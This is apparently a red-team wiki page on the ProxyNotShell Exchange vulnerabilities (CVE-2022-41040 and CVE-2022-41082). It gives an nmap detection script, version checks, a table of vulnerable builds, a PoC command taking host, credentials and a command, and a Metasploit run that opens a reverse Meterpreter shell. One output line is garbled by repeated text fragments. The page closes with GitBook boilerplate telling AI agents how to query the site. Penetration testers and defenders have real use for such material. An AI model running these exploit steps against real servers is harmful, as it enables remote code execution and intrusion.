> For the complete documentation index, see [llms.txt](https://red.infiltr8.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red.infiltr8.io/ad/movement/exchange-services/proxynotshell.md).

# ProxyNotShell

## Theory

ProxyNotShell is identified with the following CVEs: CVE-2022–41040 and CVE-2022–41082. The vulnerabilities affect Microsoft Exchange on premises with an **Outlook Web App.**

**CVE-2022-41040** : SSRF\
This vulnerability allow attackers to send an arbitrary request with a controlled URI and controlled data to an arbitrary backend service with LocalSystem privilege. (Request is very similar to the [ProxyShell](/ad/movement/exchange-services/proxyshell.md) one)

<figure><img src="/files/RPJgrgxIn0AZjfCROKrZ" alt=""><figcaption><p><strong>CVE-2022-41040 - SSRF</strong><br></p></figcaption></figure>

**CVE-2022-41082** : RCE\
By abusing CVE-2022-41040 **authenticated** users may exploit CVE-2022-41082 to run arbitrary commands in vulnerable Exchange Servers.

<figure><img src="/files/BL7RN4UlWt1kjT6hTTI2" alt=""><figcaption><p><strong>CVE-2022-41082</strong> - RCE Request</p></figcaption></figure>

## Practice

{% tabs %}
{% tab title="Enumerate" %}
We can use the [proxynotshell\_checker.nse](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse) nmap script to scan a target

```bash
nmap -p80,443 --script="proxynotshell_checker.nse" $IP

443/tcp open  https
    |_proxynotshell_checker: Potentially vulnerable to ProxyNotShell (mitigation not applied).
```

If we have local access to the target running exchange, we can check it version using the following powershell command:

```powershell
#Method 1
PS> GCM exsetup |%{$_.Fileversioninfo}

#Method 2
PS> (Get-Command ExSetup.exe).FileVersionInfo.ProductVersion

ProductVersion   FileVersion      FileName                                                                             
--------------   -----------      --------                                                                             
15.02.0858.005   15.2.1118.20   C:\Program Files\Microsoft\Exchange Server\V15\bin\ExSetup.exe
```

We can now search for the exact Microsoft Exchange product version using [this microsoft link](https://learn.microsoft.com/fr-fr/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019).\
\
Following versions are vulnerable :

| Version            | Vulnerable ProductVersion |
| ------------------ | ------------------------- |
| Exchange 2019 CU12 | < 15.2.1118.20            |
| Exchange 2019 CU11 | < 15.2.986.36             |
| Exchange 2016 CU23 | < 15.1.2507.16            |
| Exchange 2016 CU22 | < 15.1.2375.33            |
| Exchange 2013 CU23 | < 15.0.1497.32            |

{% hint style="info" %}
All versions before November 8, 2022 are vulnerable
{% endhint %}
{% endtab %}

{% tab title="Exploit" %}
We can use [testanull's python script](https://github.com/testanull/ProxyNotShell-PoC) to exploit this vulnerability

```bash
# Install dependecies
pip install requests_ntlm2 requests

#Exploit
python poc_aug3.py <host> <username> <password> <command>
```

{% endtab %}

{% tab title="Exploit - Metasploit" %}
A Metasploit module is available to exploit ProxyNotShell

{% hint style="info" %}
This exploit only support Exchange Server 2019
{% endhint %}

```bash
msf6 > use exploit/windows/http/exchange_proxynotshell_rce

msf6 exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
USERNAME => aliddle
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/http/exchange_proxynotshell_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (175686 bytes) to 192.168.159.11
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 1We can use the We can use the We can use theWe can use the92.168.159.11:7290) at 2022-11-18 17:32:18 -0500

meterpreter > 
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="<https://www.rezilion.com/blog/proxyshell-or-proxynotshell-lets-set-the-record-straight/>" %}

{% embed url="<https://www.picussecurity.com/resource/blog/proxynotshellcve-2022-41040-and-cve-2022-41082-exploits-explained>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://red.infiltr8.io/ad/movement/exchange-services/proxynotshell.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.